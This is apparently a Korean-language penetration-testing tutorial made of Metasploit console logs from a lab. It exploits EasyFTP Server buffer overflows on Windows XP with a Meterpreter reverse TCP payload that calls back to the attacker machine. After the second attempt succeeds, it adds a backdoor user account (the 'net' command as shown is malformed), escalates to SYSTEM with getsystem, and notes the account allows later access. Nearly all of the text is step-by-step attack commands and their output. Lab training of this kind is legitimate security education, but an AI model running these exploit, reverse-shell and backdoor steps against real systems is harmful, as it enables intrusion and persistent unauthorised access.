meterpreter > kill 2944


meterpreter > quit

[*] Shutting down Meterpreter...


[*] 192.168.10.135 - Meterpreter session 3 closed.  Reason: User exit

msf exploit(ms08_067_netapi) > 

msf exploit(ms08_067_netapi) > back

msf > 



Ex7) FTP Application 취약점을 이용한 공격 I

 - Win XP에서 easyFTP 실행

msf > search easyftp

Matching Modules
================

   Name                                     Disclosure Date  Rank   Description
   ----                                     ---------------  ----   -----------
   exploit/windows/ftp/easyftp_cwd_fixret   2010-02-16       great  EasyFTP Server CWD Command Stack 
Buffer Overflow
   exploit/windows/ftp/easyftp_list_fixret  2010-07-05       great  EasyFTP Server LIST Command Stack 
Buffer Overflow
   exploit/windows/ftp/easyftp_mkd_fixret   2010-04-04       great  EasyFTP Server MKD Command Stack 
Buffer Overflow
   exploit/windows/http/easyftp_list        2010-02-18       great  EasyFTP Server list.html path Stack Buffer 
Overflow


msf > use windows/ftp/easyftp_list_fixret

msf exploit(easyftp_list_fixret) > show options

Module options (exploit/windows/ftp/easyftp_list_fixret):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST                         yes       The target address
   RPORT    21                   yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 - Version 2002


msf exploit(easyftp_list_fixret) > show payloads

Compatible Payloads
===================

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   generic/custom                                                       normal  Custom Payload
   generic/debug_trap      

~ 중간 생략 ~

 windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective 
Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective 
Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns        


msf exploit(easyftp_list_fixret) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP SP3 - Version 2002


msf exploit(easyftp_list_fixret) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(easyftp_list_fixret) > set RHOST 192.168.10.135
RHOST => 192.168.10.135

msf exploit(easyftp_list_fixret) > set LHOST 192.168.10.134
LHOST => 192.168.10.134

msf exploit(easyftp_list_fixret) > set TARGET 0
TARGET => 0

msf exploit(easyftp_list_fixret) > show options

Module options (exploit/windows/ftp/easyftp_list_fixret):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.10.135        yes       The target address
   RPORT    21                   yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.10.134    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP3 - Version 2002


msf exploit(easyftp_list_fixret) > exploit 

[*] Started reverse handler on 192.168.10.134:4444 
[*] Prepending fixRet...
[*] Adding the payload...
[*] Overwriting part of the payload with target address...
[*] Sending exploit buffer...

msf exploit(easyftp_list_fixret) > back
msf > 

 - 공격 안됨
 - Win XP 확인하면, FTP 서비스가 중지됨(이유 : 공격 모듈 버전과 타켓 FTP 버전이 일치하지 않음)



Ex8) FTP Application 취약점을 이용한 공격 II

 - Win XP에서 easyFTP 실행 및 버전 확인 (1.7.0.11)
 
msf > search easyftp

Matching Modules
================

   Name                                     Disclosure Date  Rank   Description
   ----                                     ---------------  ----   -----------
   exploit/windows/ftp/easyftp_cwd_fixret   2010-02-16       great  EasyFTP Server CWD Command Stack 
Buffer Overflow
   exploit/windows/ftp/easyftp_list_fixret  2010-07-05       great  EasyFTP Server LIST Command Stack 
Buffer Overflow
   exploit/windows/ftp/easyftp_mkd_fixret   2010-04-04       great  EasyFTP Server MKD Command Stack 
Buffer Overflow
   exploit/windows/http/easyftp_list        2010-02-18       great  EasyFTP Server list.html path Stack Buffer 
Overflow


msf > use windows/ftp/easyftp_cwd_fixret
msf exploit(easyftp_cwd_fixret) > show options

Module options (exploit/windows/ftp/easyftp_cwd_fixret):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST                         yes       The target address
   RPORT    21                   yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal - v1.7.0.2


msf exploit(easyftp_cwd_fixret) > show payloads

Compatible Payloads
===================

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   generic/custom                                                       normal  Custom Payload

~ 중간 생략 ~

 windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective 
Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective 
Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns        



msf exploit(easyftp_cwd_fixret) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal - v1.7.0.2
   1   Windows Universal - v1.7.0.3
   2   Windows Universal - v1.7.0.4
   3   Windows Universal - v1.7.0.5
   4   Windows Universal - v1.7.0.6
   5   Windows Universal - v1.7.0.7
   6   Windows Universal - v1.7.0.8
   7   Windows Universal - v1.7.0.9
   8   Windows Universal - v1.7.0.10
   9   Windows Universal - v1.7.0.11


msf exploit(easyftp_cwd_fixret) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(easyftp_cwd_fixret) >  set RHOST 192.168.10.135
RHOST => 192.168.10.135

msf exploit(easyftp_cwd_fixret) > set LHOST 192.168.10.134
LHOST => 192.168.10.134

msf exploit(easyftp_cwd_fixret) > set target 9
target => 9

msf exploit(easyftp_cwd_fixret) > show options

Module options (exploit/windows/ftp/easyftp_cwd_fixret):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.10.135       yes       The target address
   RPORT    21                   yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.10.134   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   9   Windows Universal - v1.7.0.11


msf exploit(easyftp_cwd_fixret) > exploit 

[*] Started reverse handler on 192.168.10.134:4444 
[*] Prepending fixRet...
[*] Adding the payload...
[*] Overwriting part of the payload with target address...
[*] Sending exploit buffer...
[*] Sending stage (885806 bytes) to 192.168.10.135
[*] Meterpreter session 4 opened (192.168.10.134:4444 -> 192.168.10.135:1093) at 2016-01-24 1

meterpreter > 

 - Win XP FTP 상태 확인



Ex9) 백도어 계정 생성 및 계정 권한 상승 설정

meterpreter > shell
Process 2484 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
C:\WINDOWS\system32>net test test1234 /add
net test test1234 /add


C:\WINDOWS\system32>exit
exit

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 - 차후 test/test1234 계정을 이용하여 Win XP SSH 및 기타 서비스 접속이 가능하다.

meterpreter > 
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.10.135 - Meterpreter session 4 closed.  Reason: User exit

msf exploit(easyftp_cwd_fixret) > quit
root@kali:~# 


Posted by 교육 문의 : 010-9902-9710(김정우 강사)


Q